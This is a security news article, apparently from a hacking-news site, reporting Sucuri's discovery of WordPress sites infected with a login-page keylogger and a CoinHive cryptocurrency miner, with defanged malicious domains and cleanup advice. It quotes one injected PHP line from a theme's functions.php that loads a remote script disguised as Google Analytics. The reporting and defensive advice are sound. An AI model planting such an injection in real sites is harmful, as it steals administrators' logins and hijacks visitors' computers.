Thousands Of WordPress Websites Have Been Infected With A Key-logger & In-Browser Cryptocurrency Miner

  • 241
  •  
  •  
  • 1
  •  
  •  
  •  
    242
    Shares

Security researchers from Sucuri have found that about 2,000 WordPress CMS websites are infected with a malicious script (keylogger) that’s running on the WordPress backend login page and a web browser cryptocurrency miner called CoinHive on their frontends.

The researchers said that the new attack is tied to a similar operation that took place in early December 2017 that infected over 5,500 WordPress websites. Both incidents used a keylogger and cryptocurrency malware named cloudflare[.]solutions. The name is obtained from the domain name used to serve up the malware in the first attack, cloudflare[.]solutions.

Cybercriminals inject these malicious scrips on WordPress CMS source code with weak or outdated security.

According to Sucuri researchers:
The cdjs[.]online script is injected into either a WordPress database (wp_posts table) or into the theme’s functions.php file, just like we saw in the former cloudflare[.]solutions attack. The cdns[.]ws and msdns[.]online scripts can also be found injected into the theme’s functions.php file:

"function chmnr_klgr_enqueue_script() {wp_enqueue_script( 'chmnr_klgr-js', 'hxxps://cdns[.]ws/lib/googleanalytics.js', false );"

The new campaigns do not yet seem to be as heavy as the first malware campaign, but there are many websites that have failed to correctly secure themselves after the original infection.

“To clean up a website that has been compromised with this infection, you’ll need to remove the malicious code from theme’s functions.php, scan wp_posts table for possible injections, change all WordPress passwords(!) and update all server software including third-party themes and plugins.”

The following two tabs change content below.
Avatar

Unallocated Author

Please note that the article you are reading has an unallocated author as the original author is no longer employed at latesthackingnews.com, this has been put in place to adhere with general data protection regulations (GDPR). If you have any further queries, please contact: [email protected]
Avatar

Unallocated Author

Please note that the article you are reading has an unallocated author as the original author is no longer employed at latesthackingnews.com, this has been put in place to adhere with general data protection regulations (GDPR). If you have any further queries, please contact: [email protected]

Do NOT follow this link or you will be banned from the site!